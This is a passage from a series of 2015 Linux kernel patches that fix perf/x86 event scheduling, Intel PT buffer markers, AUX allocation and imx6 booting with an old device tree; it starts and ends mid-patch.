Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: lizefan@huawei.com Cc: pi3orama@163.com Fixes: 2541517c32be ("tracing, perf: Implement BPF programs attached to kprobes") Link: http://lkml.kernel.org/r/1431717321-28772-1-git-send-email-ast@plumgrid.com Signed-off-by: Ingo Molnar --- kernel/events/core.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 1a3bf48743ce..eddf1ed4155e 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -3442,7 +3442,6 @@ static void free_event_rcu(struct rcu_head *head) if (event->ns) put_pid_ns(event->ns); perf_event_free_filter(event); - perf_event_free_bpf_prog(event); kfree(event); } @@ -3573,6 +3572,8 @@ static void __free_event(struct perf_event *event) put_callchain_buffers(); } + perf_event_free_bpf_prog(event); + if (event->destroy) event->destroy(event); From b371b594317869971af326adcf7cd65cabdb4087 Mon Sep 17 00:00:00 2001 From: Peter Zijlstra Date: Thu, 21 May 2015 10:57:13 +0200 Subject: [PATCH 282/872] perf/x86: Fix event/group validation Commit 43b4578071c0 ("perf/x86: Reduce stack usage of x86_schedule_events()") violated the rule that 'fake' scheduling; as used for event/group validation; should not change the event state. This went mostly un-noticed because repeated calls of x86_pmu::get_event_constraints() would give the same result. And x86_pmu::put_event_constraints() would mostly not do anything. Commit e979121b1b15 ("perf/x86/intel: Implement cross-HT corruption bug workaround") made the situation much worse by actually setting the event->hw.constraint value to NULL, so when validation and actual scheduling interact we get NULL ptr derefs. Fix it by removing the constraint pointer from the event and move it back to an array, this time in cpuc instead of on the stack. validate_group() x86_schedule_events() event->hw.constraint = c; # store perf_task_event_sched_in() ... x86_schedule_events(); event->hw.constraint = c2; # store ... put_event_constraints(event); # assume failure to schedule intel_put_event_constraints() event->hw.constraint = NULL; c = event->hw.constraint; # read -> NULL if (!test_bit(hwc->idx, c->idxmsk)) # <- *BOOM* NULL deref This in particular is possible when the event in question is a cpu-wide event and group-leader, where the validate_group() tries to add an event to the group. Reported-by: Vince Weaver Signed-off-by: Peter Zijlstra (Intel) Cc: Andrew Hunter Cc: Linus Torvalds Cc: Maria Dimakopoulou Cc: Peter Zijlstra Cc: Thomas Gleixner Fixes: 43b4578071c0 ("perf/x86: Reduce stack usage of x86_schedule_events()") Fixes: e979121b1b15 ("perf/x86/intel: Implement cross-HT corruption bug workaround") Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/perf_event.c | 33 ++++++++++--------- arch/x86/kernel/cpu/perf_event.h | 9 ++--- arch/x86/kernel/cpu/perf_event_intel.c | 15 +++------ arch/x86/kernel/cpu/perf_event_intel_ds.c | 4 +-- arch/x86/kernel/cpu/perf_event_intel_uncore.c | 7 ++-- arch/x86/kernel/cpu/perf_event_intel_uncore.h | 1 + include/linux/perf_event.h | 4 --- 7 files changed, 33 insertions(+), 40 deletions(-) diff --git a/arch/x86/kernel/cpu/perf_event.c b/arch/x86/kernel/cpu/perf_event.c index 87848ebe2bb7..1664eeea65e0 100644 --- a/arch/x86/kernel/cpu/perf_event.c +++ b/arch/x86/kernel/cpu/perf_event.c @@ -620,7 +620,7 @@ struct sched_state { struct perf_sched { int max_weight; int max_events; - struct perf_event **events; + struct event_constraint **constraints; struct sched_state state; int saved_states; struct sched_state saved[SCHED_STATES_MAX]; @@ -629,7 +629,7 @@ struct perf_sched { /* * Initialize interator that runs through all events and counters. */ -static void perf_sched_init(struct perf_sched *sched, struct perf_event **events, +static void perf_sched_init(struct perf_sched *sched, struct event_constraint **constraints, int num, int wmin, int wmax) { int idx; @@ -637,10 +637,10 @@ static void perf_sched_init(struct perf_sched *sched, struct perf_event **events memset(sched, 0, sizeof(*sched)); sched->max_events = num; sched->max_weight = wmax; - sched->events = events; + sched->constraints = constraints; for (idx = 0; idx < num; idx++) { - if (events[idx]->hw.constraint->weight == wmin) + if (constraints[idx]->weight == wmin) break; } @@ -687,7 +687,7 @@ static bool __perf_sched_find_counter(struct perf_sched *sched) if (sched->state.event >= sched->max_events) return false; - c = sched->events[sched->state.event]->hw.constraint; + c = sched->constraints[sched->state.event]; /* Prefer fixed purpose counters */ if (c->idxmsk64 & (~0ULL << INTEL_PMC_IDX_FIXED)) { idx = INTEL_PMC_IDX_FIXED; @@ -745,7 +745,7 @@ static bool perf_sched_next_event(struct perf_sched *sched) if (sched->state.weight > sched->max_weight) return false; } - c = sched->events[sched->state.event]->hw.constraint; + c = sched->constraints[sched->state.event]; } while (c->weight != sched->state.weight); sched->state.counter = 0; /* start with first counter */ @@ -756,12 +756,12 @@ static bool perf_sched_next_event(struct perf_sched *sched) /* * Assign a counter for each event. */ -int perf_assign_events(struct perf_event **events, int n, +int perf_assign_events(struct event_constraint **constraints, int n, int wmin, int wmax, int *assign) { struct perf_sched sched; - perf_sched_init(&sched, events, n, wmin, wmax); + perf_sched_init(&sched, constraints, n, wmin, wmax); do { if (!perf_sched_find_counter(&sched)) @@ -788,9 +788,9 @@ int x86_schedule_events(struct cpu_hw_events *cpuc, int n, int *assign) x86_pmu.start_scheduling(cpuc); for (i = 0, wmin = X86_PMC_IDX_MAX, wmax = 0; i < n; i++) { - hwc = &cpuc->event_list[i]->hw; + cpuc->event_constraint[i] = NULL; c = x86_pmu.get_event_constraints(cpuc, i, cpuc->event_list[i]); - hwc->constraint = c; + cpuc->event_constraint[i] = c; wmin = min(wmin, c->weight); wmax = max(wmax, c->weight); @@ -801,7 +801,7 @@ int x86_schedule_events(struct cpu_hw_events *cpuc, int n, int *assign) */ for (i = 0; i < n; i++) { hwc = &cpuc->event_list[i]->hw; - c = hwc->constraint; + c = cpuc->event_constraint[i]; /* never assigned */ if (hwc->idx == -1) @@ -821,9 +821,10 @@ int x86_schedule_events(struct cpu_hw_events *cpuc, int n, int *assign) } /* slow path */ - if (i != n) - unsched = perf_assign_events(cpuc->event_list, n, wmin, + if (i != n) { + unsched = perf_assign_events(cpuc->event_constraint, n, wmin, wmax, assign); + } /* * In case of success (unsched = 0), mark events as committed, @@ -840,7 +841,7 @@ int x86_schedule_events(struct cpu_hw_events *cpuc, int n, int *assign) e = cpuc->event_list[i]; e->hw.flags |= PERF_X86_EVENT_COMMITTED; if (x86_pmu.commit_scheduling) - x86_pmu.commit_scheduling(cpuc, e, assign[i]); + x86_pmu.commit_scheduling(cpuc, i, assign[i]); } } @@ -1292,8 +1293,10 @@ static void x86_pmu_del(struct perf_event *event, int flags) x86_pmu.put_event_constraints(cpuc, event); /* Delete the array entry. */ - while (++i < cpuc->n_events) + while (++i < cpuc->n_events) { cpuc->event_list[i-1] = cpuc->event_list[i]; + cpuc->event_constraint[i-1] = cpuc->event_constraint[i]; + } --cpuc->n_events; perf_event_update_userpage(event); diff --git a/arch/x86/kernel/cpu/perf_event.h b/arch/x86/kernel/cpu/perf_event.h index 6ac5cb7a9e14..fdfaab7c5e55 100644 --- a/arch/x86/kernel/cpu/perf_event.h +++ b/arch/x86/kernel/cpu/perf_event.h @@ -172,7 +172,10 @@ struct cpu_hw_events { added in the current transaction */ int assign[X86_PMC_IDX_MAX]; /* event to counter assignment */ u64 tags[X86_PMC_IDX_MAX]; + struct perf_event *event_list[X86_PMC_IDX_MAX]; /* in enabled order */ + struct event_constraint *event_constraint[X86_PMC_IDX_MAX]; + unsigned int group_flag; int is_fake; @@ -519,9 +522,7 @@ struct x86_pmu { void (*put_event_constraints)(struct cpu_hw_events *cpuc, struct perf_event *event); - void (*commit_scheduling)(struct cpu_hw_events *cpuc, - struct perf_event *event, - int cntr); + void (*commit_scheduling)(struct cpu_hw_events *cpuc, int idx, int cntr); void (*start_scheduling)(struct cpu_hw_events *cpuc); @@ -717,7 +718,7 @@ static inline void __x86_pmu_enable_event(struct hw_perf_event *hwc, void x86_pmu_enable_all(int added); -int perf_assign_events(struct perf_event **events, int n, +int perf_assign_events(struct event_constraint **constraints, int n, int wmin, int wmax, int *assign); int x86_schedule_events(struct cpu_hw_events *cpuc, int n, int *assign); diff --git a/arch/x86/kernel/cpu/perf_event_intel.c b/arch/x86/kernel/cpu/perf_event_intel.c index 3998131d1a68..7a58fb5df15c 100644 --- a/arch/x86/kernel/cpu/perf_event_intel.c +++ b/arch/x86/kernel/cpu/perf_event_intel.c @@ -2106,7 +2106,7 @@ static struct event_constraint * intel_get_event_constraints(struct cpu_hw_events *cpuc, int idx, struct perf_event *event) { - struct event_constraint *c1 = event->hw.constraint; + struct event_constraint *c1 = cpuc->event_constraint[idx]; struct event_constraint *c2; /* @@ -2188,8 +2188,6 @@ intel_put_shared_regs_event_constraints(struct cpu_hw_events *cpuc, static void intel_put_event_constraints(struct cpu_hw_events *cpuc, struct perf_event *event) { - struct event_constraint *c = event->hw.constraint; - intel_put_shared_regs_event_constraints(cpuc, event); /* @@ -2197,19 +2195,14 @@ static void intel_put_event_constraints(struct cpu_hw_events *cpuc, * all events are subject to and must call the * put_excl_constraints() routine */ - if (c && cpuc->excl_cntrs) + if (cpuc->excl_cntrs) intel_put_excl_constraints(cpuc, event); - - /* cleanup dynamic constraint */ - if (c && (c->flags & PERF_X86_EVENT_DYNAMIC)) - event->hw.constraint = NULL; } -static void intel_commit_scheduling(struct cpu_hw_events *cpuc, - struct perf_event *event, int cntr) +static void intel_commit_scheduling(struct cpu_hw_events *cpuc, int idx, int cntr) { struct intel_excl_cntrs *excl_cntrs = cpuc->excl_cntrs; - struct event_constraint *c = event->hw.constraint; + struct event_constraint *c = cpuc->event_constraint[idx]; struct intel_excl_states *xlo, *xl; int tid = cpuc->excl_thread_id; int o_tid = 1 - tid; diff --git a/arch/x86/kernel/cpu/perf_event_intel_ds.c b/arch/x86/kernel/cpu/perf_event_intel_ds.c index 813f75d71175..7f73b3553e2e 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_ds.c +++ b/arch/x86/kernel/cpu/perf_event_intel_ds.c @@ -706,9 +706,9 @@ void intel_pmu_pebs_disable(struct perf_event *event) cpuc->pebs_enabled &= ~(1ULL << hwc->idx); - if (event->hw.constraint->flags & PERF_X86_EVENT_PEBS_LDLAT) + if (event->hw.flags & PERF_X86_EVENT_PEBS_LDLAT) cpuc->pebs_enabled &= ~(1ULL << (hwc->idx + 32)); - else if (event->hw.constraint->flags & PERF_X86_EVENT_PEBS_ST) + else if (event->hw.flags & PERF_X86_EVENT_PEBS_ST) cpuc->pebs_enabled &= ~(1ULL << 63); if (cpuc->enabled) diff --git a/arch/x86/kernel/cpu/perf_event_intel_uncore.c b/arch/x86/kernel/cpu/perf_event_intel_uncore.c index c635b8b49e93..ec2ba578d286 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_uncore.c +++ b/arch/x86/kernel/cpu/perf_event_intel_uncore.c @@ -365,9 +365,8 @@ static int uncore_assign_events(struct intel_uncore_box *box, int assign[], int bitmap_zero(used_mask, UNCORE_PMC_IDX_MAX); for (i = 0, wmin = UNCORE_PMC_IDX_MAX, wmax = 0; i < n; i++) { - hwc = &box->event_list[i]->hw; c = uncore_get_event_constraint(box, box->event_list[i]); - hwc->constraint = c; + box->event_constraint[i] = c; wmin = min(wmin, c->weight); wmax = max(wmax, c->weight); } @@ -375,7 +374,7 @@ static int uncore_assign_events(struct intel_uncore_box *box, int assign[], int /* fastpath, try to reuse previous register */ for (i = 0; i < n; i++) { hwc = &box->event_list[i]->hw; - c = hwc->constraint; + c = box->event_constraint[i]; /* never assigned */ if (hwc->idx == -1) @@ -395,7 +394,7 @@ static int uncore_assign_events(struct intel_uncore_box *box, int assign[], int } /* slow path */ if (i != n) - ret = perf_assign_events(box->event_list, n, + ret = perf_assign_events(box->event_constraint, n, wmin, wmax, assign); if (!assign || ret) { diff --git a/arch/x86/kernel/cpu/perf_event_intel_uncore.h b/arch/x86/kernel/cpu/perf_event_intel_uncore.h index 6c8c1e7e69d8..f789ec9a0133 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_uncore.h +++ b/arch/x86/kernel/cpu/perf_event_intel_uncore.h @@ -97,6 +97,7 @@ struct intel_uncore_box { atomic_t refcnt; struct perf_event *events[UNCORE_PMC_IDX_MAX]; struct perf_event *event_list[UNCORE_PMC_IDX_MAX]; + struct event_constraint *event_constraint[UNCORE_PMC_IDX_MAX]; unsigned long active_mask[BITS_TO_LONGS(UNCORE_PMC_IDX_MAX)]; u64 tags[UNCORE_PMC_IDX_MAX]; struct pci_dev *pci_dev; diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h index 61992cf2e977..d8a82a89f35a 100644 --- a/include/linux/perf_event.h +++ b/include/linux/perf_event.h @@ -92,8 +92,6 @@ struct hw_perf_event_extra { int idx; /* index in shared_regs->regs[] */ }; -struct event_constraint; - /** * struct hw_perf_event - performance event hardware details: */ @@ -112,8 +110,6 @@ struct hw_perf_event { struct hw_perf_event_extra extra_reg; struct hw_perf_event_extra branch_reg; - - struct event_constraint *constraint; }; struct { /* software */ struct hrtimer hrtimer; From 634a603760c26d163ff92751d91ac7b859e879c4 Mon Sep 17 00:00:00 2001 From: Lucas Stach Date: Tue, 26 May 2015 18:43:36 +0200 Subject: [PATCH 283/872] ARM: imx6: allow booting with old DT The GPC rewrite to IRQ domains has been on the premise that it may break suspend/resume for new kernels on old DT, but otherwise keep things working from a user perspective. This was an accepted compromise to be able to move the GIC cleanup forward. What actually happened was that booting a new kernel on an old DT crashes before even the console is up, so the user does not even see the warning that the DT is too old. The warning message suggests that this has been known before, which is clearly unacceptable. Fix the early crash by mapping the GPC memory space if the IRQ controller doesn't claim it. This keeps at least CPUidle and the needed CPU wakeup workarounds working. With this fixed the system is able to boot up properly minus the expected suspend/resume breakage. Signed-off-by: Lucas Stach Signed-off-by: Shawn Guo --- arch/arm/mach-imx/gpc.c | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/arch/arm/mach-imx/gpc.c b/arch/arm/mach-imx/gpc.c index 4d60005e9277..bbf015056221 100644 --- a/arch/arm/mach-imx/gpc.c +++ b/arch/arm/mach-imx/gpc.c @@ -280,9 +280,15 @@ void __init imx_gpc_check_dt(void) struct device_node *np; np = of_find_compatible_node(NULL, NULL, "fsl,imx6q-gpc"); - if (WARN_ON(!np || - !of_find_property(np, "interrupt-controller", NULL))) - pr_warn("Outdated DT detected, system is about to crash!!!\n"); + if (WARN_ON(!np)) + return; + + if (WARN_ON(!of_find_property(np, "interrupt-controller", NULL))) { + pr_warn("Outdated DT detected, suspend/resume will NOT work\n"); + + /* map GPC, so that at least CPUidle and WARs keep working */ + gpc_base = of_iomap(np, 0); + } } #ifdef CONFIG_PM_GENERIC_DOMAINS From cc1790cf541553263bda024295d7600c7cd7c45d Mon Sep 17 00:00:00 2001 From: Peter Zijlstra Date: Thu, 21 May 2015 10:57:17 +0200 Subject: [PATCH 284/872] perf/x86: Improve HT workaround GP counter constraint The (SNB/IVB/HSW) HT bug only affects events that can be programmed onto GP counters, therefore we should only limit the number of GP counters that can be used per cpu -- iow we should not constrain the FP counters. Furthermore, we should only enfore such a limit when there are in fact exclusive events being scheduled on either sibling. Reported-by: Vince Weaver Signed-off-by: Peter Zijlstra (Intel) Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner [ Fixed build fail for the !CONFIG_CPU_SUP_INTEL case. ] Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/perf_event.c | 36 +++++++++++++++---- arch/x86/kernel/cpu/perf_event.h | 15 ++++++-- arch/x86/kernel/cpu/perf_event_intel.c | 30 ++++++---------- arch/x86/kernel/cpu/perf_event_intel_uncore.c | 2 +- 4 files changed, 53 insertions(+), 30 deletions(-) diff --git a/arch/x86/kernel/cpu/perf_event.c b/arch/x86/kernel/cpu/perf_event.c index 1664eeea65e0..2eca19422454 100644 --- a/arch/x86/kernel/cpu/perf_event.c +++ b/arch/x86/kernel/cpu/perf_event.c @@ -611,6 +611,7 @@ struct sched_state { int event; /* event index */ int counter; /* counter index */ int unassigned; /* number of events to be assigned left */ + int nr_gp; /* number of GP counters used */ unsigned long used[BITS_TO_LONGS(X86_PMC_IDX_MAX)]; }; @@ -620,9 +621,10 @@ struct sched_state { struct perf_sched { int max_weight; int max_events; + int max_gp; + int saved_states; struct event_constraint **constraints; struct sched_state state; - int saved_states; struct sched_state saved[SCHED_STATES_MAX]; }; @@ -630,13 +632,14 @@ struct perf_sched { * Initialize interator that runs through all events and counters. */ static void perf_sched_init(struct perf_sched *sched, struct event_constraint **constraints, - int num, int wmin, int wmax) + int num, int wmin, int wmax, int gpmax) { int idx; memset(sched, 0, sizeof(*sched)); sched->max_events = num; sched->max_weight = wmax; + sched->max_gp = gpmax; sched->constraints = constraints; for (idx = 0; idx < num; idx++) { @@ -696,11 +699,16 @@ static bool __perf_sched_find_counter(struct perf_sched *sched) goto done; } } + /* Grab the first unused counter starting with idx */ idx = sched->state.counter; for_each_set_bit_from(idx, c->idxmsk, INTEL_PMC_IDX_FIXED) { - if (!__test_and_set_bit(idx, sched->state.used)) + if (!__test_and_set_bit(idx, sched->state.used)) { + if (sched->state.nr_gp++ >= sched->max_gp) + return false; + goto done; + } } return false; @@ -757,11 +765,11 @@ static bool perf_sched_next_event(struct perf_sched *sched) * Assign a counter for each event. */ int perf_assign_events(struct event_constraint **constraints, int n, - int wmin, int wmax, int *assign) + int wmin, int wmax, int gpmax, int *assign) { struct perf_sched sched; - perf_sched_init(&sched, constraints, n, wmin, wmax); + perf_sched_init(&sched, constraints, n, wmin, wmax, gpmax); do { if (!perf_sched_find_counter(&sched)) @@ -822,8 +830,24 @@ int x86_schedule_events(struct cpu_hw_events *cpuc, int n, int *assign) /* slow path */ if (i != n) { + int gpmax = x86_pmu.num_counters; + + /* + * Do not allow scheduling of more than half the available + * generic counters. + * + * This helps avoid counter starvation of sibling thread by + * ensuring at most half the counters cannot be in exclusive + * mode. There is no designated counters for the limits. Any + * N/2 counters can be used. This helps with events with + * specific counter constraints. + */ + if (is_ht_workaround_enabled() && !cpuc->is_fake && + READ_ONCE(cpuc->excl_cntrs->exclusive_present)) + gpmax /= 2; + unsched = perf_assign_events(cpuc->event_constraint, n, wmin, - wmax, assign); + wmax, gpmax, assign); } /* diff --git a/arch/x86/kernel/cpu/perf_event.h b/arch/x86/kernel/cpu/perf_event.h index fdfaab7c5e55..ef78516850fb 100644 --- a/arch/x86/kernel/cpu/perf_event.h +++ b/arch/x86/kernel/cpu/perf_event.h @@ -74,6 +74,7 @@ struct event_constraint { #define PERF_X86_EVENT_EXCL 0x0040 /* HT exclusivity on counter */ #define PERF_X86_EVENT_DYNAMIC 0x0080 /* dynamic alloc'd constraint */ #define PERF_X86_EVENT_RDPMC_ALLOWED 0x0100 /* grant rdpmc permission */ +#define PERF_X86_EVENT_EXCL_ACCT 0x0200 /* accounted EXCL event */ struct amd_nb { @@ -134,8 +135,6 @@ enum intel_excl_state_type { struct intel_excl_states { enum intel_excl_state_type init_state[X86_PMC_IDX_MAX]; enum intel_excl_state_type state[X86_PMC_IDX_MAX]; - int num_alloc_cntrs;/* #counters allocated */ - int max_alloc_cntrs;/* max #counters allowed */ bool sched_started; /* true if scheduling has started */ }; @@ -144,6 +143,11 @@ struct intel_excl_cntrs { struct intel_excl_states states[2]; + union { + u16 has_exclusive[2]; + u32 exclusive_present; + }; + int refcnt; /* per-core: #HT threads */ unsigned core_id; /* per-core: core id */ }; @@ -176,6 +180,7 @@ struct cpu_hw_events { struct perf_event *event_list[X86_PMC_IDX_MAX]; /* in enabled order */ struct event_constraint *event_constraint[X86_PMC_IDX_MAX]; + int n_excl; /* the number of exclusive events */ unsigned int group_flag; int is_fake; @@ -719,7 +724,7 @@ static inline void __x86_pmu_enable_event(struct hw_perf_event *hwc, void x86_pmu_enable_all(int added); int perf_assign_events(struct event_constraint **constraints, int n, - int wmin, int wmax, int *assign); + int wmin, int wmax, int gpmax, int *assign); int x86_schedule_events(struct cpu_hw_events *cpuc, int n, int *assign); void x86_pmu_stop(struct perf_event *event, int flags); @@ -930,4 +935,8 @@ static inline struct intel_shared_regs *allocate_shared_regs(int cpu) return NULL; } +static inline int is_ht_workaround_enabled(void) +{ + return 0; +} #endif /* CONFIG_CPU_SUP_INTEL */ diff --git a/arch/x86/kernel/cpu/perf_event_intel.c b/arch/x86/kernel/cpu/perf_event_intel.c index 7a58fb5df15c..a1e35c9f06b9 100644 --- a/arch/x86/kernel/cpu/perf_event_intel.c +++ b/arch/x86/kernel/cpu/perf_event_intel.c @@ -1923,7 +1923,6 @@ intel_start_scheduling(struct cpu_hw_events *cpuc) xl = &excl_cntrs->states[tid]; xl->sched_started = true; - xl->num_alloc_cntrs = 0; /* * lock shared state until we are done scheduling * in stop_event_scheduling() @@ -2000,6 +1999,11 @@ intel_get_excl_constraints(struct cpu_hw_events *cpuc, struct perf_event *event, * across HT threads */ is_excl = c->flags & PERF_X86_EVENT_EXCL; + if (is_excl && !(event->hw.flags & PERF_X86_EVENT_EXCL_ACCT)) { + event->hw.flags |= PERF_X86_EVENT_EXCL_ACCT; + if (!cpuc->n_excl++) + WRITE_ONCE(excl_cntrs->has_exclusive[tid], 1); + } /* * xl = state of current HT @@ -2008,18 +2012,6 @@ intel_get_excl_constraints(struct cpu_hw_events *cpuc, struct perf_event *event, xl = &excl_cntrs->states[tid]; xlo = &excl_cntrs->states[o_tid]; - /* - * do not allow scheduling of more than max_alloc_cntrs - * which is set to half the available generic counters. - * this helps avoid counter starvation of sibling thread - * by ensuring at most half the counters cannot be in - * exclusive mode. There is not designated counters for the - * limits. Any N/2 counters can be used. This helps with - * events with specifix counter constraints - */ - if (xl->num_alloc_cntrs++ == xl->max_alloc_cntrs) - return &emptyconstraint; - cx = c; /* @@ -2150,6 +2142,11 @@ static void intel_put_excl_constraints(struct cpu_hw_events *cpuc, xl = &excl_cntrs->states[tid]; xlo = &excl_cntrs->states[o_tid]; + if (hwc->flags & PERF_X86_EVENT_EXCL_ACCT) { + hwc->flags &= ~PERF_X86_EVENT_EXCL_ACCT; + if (!--cpuc->n_excl) + WRITE_ONCE(excl_cntrs->has_exclusive[tid], 0); + } /* * put_constraint may be called from x86_schedule_events() @@ -2632,8 +2629,6 @@ static void intel_pmu_cpu_starting(int cpu) cpuc->lbr_sel = &cpuc->shared_regs->regs[EXTRA_REG_LBR]; if (x86_pmu.flags & PMU_FL_EXCL_CNTRS) { - int h = x86_pmu.num_counters >> 1; - for_each_cpu(i, topology_thread_cpumask(cpu)) { struct intel_excl_cntrs *c; @@ -2647,11 +2642,6 @@ static void intel_pmu_cpu_starting(int cpu) } cpuc->excl_cntrs->core_id = core_id; cpuc->excl_cntrs->refcnt++; - /* - * set hard limit to half the number of generic counters - */ - cpuc->excl_cntrs->states[0].max_alloc_cntrs = h; - cpuc->excl_cntrs->states[1].max_alloc_cntrs = h; } } diff --git a/arch/x86/kernel/cpu/perf_event_intel_uncore.c b/arch/x86/kernel/cpu/perf_event_intel_uncore.c index ec2ba578d286..dd319e59246b 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_uncore.c +++ b/arch/x86/kernel/cpu/perf_event_intel_uncore.c @@ -395,7 +395,7 @@ static int uncore_assign_events(struct intel_uncore_box *box, int assign[], int /* slow path */ if (i != n) ret = perf_assign_events(box->event_constraint, n, - wmin, wmax, assign); + wmin, wmax, n, assign); if (!assign || ret) { for (i = 0; i < n; i++) From aa319bcd366349c6f72fcd331da89d3d06090651 Mon Sep 17 00:00:00 2001 From: Alexander Shishkin Date: Fri, 22 May 2015 18:30:20 +0300 Subject: [PATCH 285/872] perf: Disallow sparse AUX allocations for non-SG PMUs in overwrite mode PMUs that don't support hardware scatter tables require big contiguous chunks of memory and a PMI to switch between them. However, in overwrite using a PMI for this purpose adds extra overhead that the users would like to avoid. Thus, in overwrite mode for such PMUs we can only allow one contiguous chunk for the entire requested buffer. This patch changes the behavior accordingly, so that if the buddy allocator fails to come up with a single high-order chunk for the entire requested buffer, the allocation will fail. Signed-off-by: Alexander Shishkin Signed-off-by: Peter Zijlstra (Intel) Cc: Linus Torvalds Cc: Paul Mackerras Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: acme@infradead.org Cc: adrian.hunter@intel.com Cc: hpa@zytor.com Link: http://lkml.kernel.org/r/1432308626-18845-2-git-send-email-alexander.shishkin@linux.intel.com Signed-off-by: Ingo Molnar --- kernel/events/ring_buffer.c | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/kernel/events/ring_buffer.c b/kernel/events/ring_buffer.c index 232f00f273cb..725c416085e3 100644 --- a/kernel/events/ring_buffer.c +++ b/kernel/events/ring_buffer.c @@ -493,6 +493,20 @@ int rb_alloc_aux(struct ring_buffer *rb, struct perf_event *event, rb->aux_pages[rb->aux_nr_pages] = page_address(page++); } + /* + * In overwrite mode, PMUs that don't support SG may not handle more + * than one contiguous allocation, since they rely on PMI to do double + * buffering. In this case, the entire buffer has to be one contiguous + * chunk. + */ + if ((event->pmu->capabilities & PERF_PMU_CAP_AUX_NO_SG) && + overwrite) { + struct page *page = virt_to_page(rb->aux_pages[0]); + + if (page_private(page) != max_order) + goto out; + } + rb->aux_priv = event->pmu->setup_aux(event->cpu, rb->aux_pages, nr_pages, overwrite); if (!rb->aux_priv) From f73ec48c90016f89d05726f6c48e66991a790fd7 Mon Sep 17 00:00:00 2001 From: Alexander Shishkin Date: Fri, 22 May 2015 18:30:22 +0300 Subject: [PATCH 286/872] perf/x86/intel/pt: Untangle pt_buffer_reset_markers() Currently, pt_buffer_reset_markers() is a difficult to read knot of arithmetics with a redundant check for multiple-entry TOPA capability, a commented out wakeup marker placement and a logical error wrt to stop marker placement. The latter happens when write head is not page aligned and results in stop marker being placed one page earlier than it actually should. All these problems only affect PT implementations that support multiple-entry TOPA tables (read: proper scatter-gather). For single-entry TOPA implementations, there is no functional impact. This patch deals with all of the above. Tested on both single-entry and multiple-entry TOPA PT implementations. Signed-off-by: Alexander Shishkin Signed-off-by: Peter Zijlstra (Intel) Cc: Linus Torvalds Cc: Paul Mackerras Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: acme@infradead.org Cc: adrian.hunter@intel.com Cc: hpa@zytor.com Link: http://lkml.kernel.org/r/1432308626-18845-4-git-send-email-alexander.shishkin@linux.intel.com Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/perf_event_intel_pt.c | 34 +++++++++++++++-------- 1 file changed, 22 insertions(+), 12 deletions(-) diff --git a/arch/x86/kernel/cpu/perf_event_intel_pt.c b/arch/x86/kernel/cpu/perf_event_intel_pt.c index ffe666c2c6b5..5b804f96ad66 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_pt.c +++ b/arch/x86/kernel/cpu/perf_event_intel_pt.c @@ -615,7 +615,8 @@ static int pt_buffer_reset_markers(struct pt_buffer *buf, struct perf_output_handle *handle) { - unsigned long idx, npages, end; + unsigned long head = local64_read(&buf->head); + unsigned long idx, npages, wakeup; if (buf->snapshot) return 0; @@ -634,17 +635,26 @@ static int pt_buffer_reset_markers(struct pt_buffer *buf, buf->topa_index[buf->stop_pos]->stop = 0; buf->topa_index[buf->intr_pos]->intr = 0; - if (pt_cap_get(PT_CAP_topa_multiple_entries)) { - npages = (handle->size + 1) >> PAGE_SHIFT; - end = (local64_read(&buf->head) >> PAGE_SHIFT) + npages; - /*if (end > handle->wakeup >> PAGE_SHIFT) - end = handle->wakeup >> PAGE_SHIFT;*/ - idx = end & (buf->nr_pages - 1); - buf->stop_pos = idx; - idx = (local64_read(&buf->head) >> PAGE_SHIFT) + npages - 1; - idx &= buf->nr_pages - 1; - buf->intr_pos = idx; - } + /* how many pages till the STOP marker */ + npages = handle->size >> PAGE_SHIFT; + + /* if it's on a page boundary, fill up one more page */ + if (!offset_in_page(head + handle->size + 1)) + npages++; + + idx = (head >> PAGE_SHIFT) + npages; + idx &= buf->nr_pages - 1; + buf->stop_pos = idx; + + wakeup = handle->wakeup >> PAGE_SHIFT; + + /* in the worst case, wake up the consumer one page before hard stop */ + idx = (head >> PAGE_SHIFT) + npages - 1; + if (idx > wakeup) + idx = wakeup; + + idx &= buf->nr_pages - 1; + buf->intr_pos = idx; buf->topa_index[buf->stop_pos]->stop = 1; buf->topa_index[buf->intr_pos]->intr = 1; From 68ab747604da98f0a0414f197f346ac22888fcee Mon Sep 17 00:00:00 2001 From: Don Zickus Date: Mon, 18 May 2015 15:16:48 -0400 Subject: [PATCH 287/872] perf/x86: Tweak broken BIOS rules during check_hw_exists() I stumbled upon an AMD box that had the BIOS using a hardware performance counter. Instead of printing out a warning and continuing, it failed and blocked further perf counter usage. Looking through the history, I found this commit: a5ebe0ba3dff ("perf/x86: Check all MSRs before passing hw check") which tweaked the rules for a Xen guest on an almost identical box and now changed the behaviour. Unfortunately the rules were tweaked incorrectly and will always lead to MSR failures even though the MSRs are completely fine. What happens now is in arch/x86/kernel/cpu/perf_event.c::check_hw_exists(): for (i = 0; i < x86_pmu.num_counters; i++) { reg = x86_pmu_config_addr(i); ret = rdmsrl_safe(reg, &val); if (ret) goto msr_fail; if (val & ARCH_PERFMON_EVENTSEL_ENABLE) { bios_fail = 1; val_fail = val; reg_fail = reg; } } /* * Read the current value, change it and read it back to see if it * matches, this is needed to detect certain hardware emulators * (qemu/kvm) that don't trap on the MSR access and always return 0s. */ reg = x86_pmu_event_addr(0); ^^^^ if the first perf counter is enabled, then this routine will always fail because the counter is running. :-( if (rdmsrl_safe(reg, &val)) goto msr_fail; val ^= 0xffffUL; ret = wrmsrl_safe(reg, val); ret |= rdmsrl_safe(reg, &val_new); if (ret || val != val_new) goto msr_fail; The above bios_fail used to be a 'goto' which is why it worked in the past. Further, most vendors have migrated to using fixed counters to hide their evilness hence this problem rarely shows up now days except on a few old boxes. I fixed my problem and kept the spirit of the original Xen 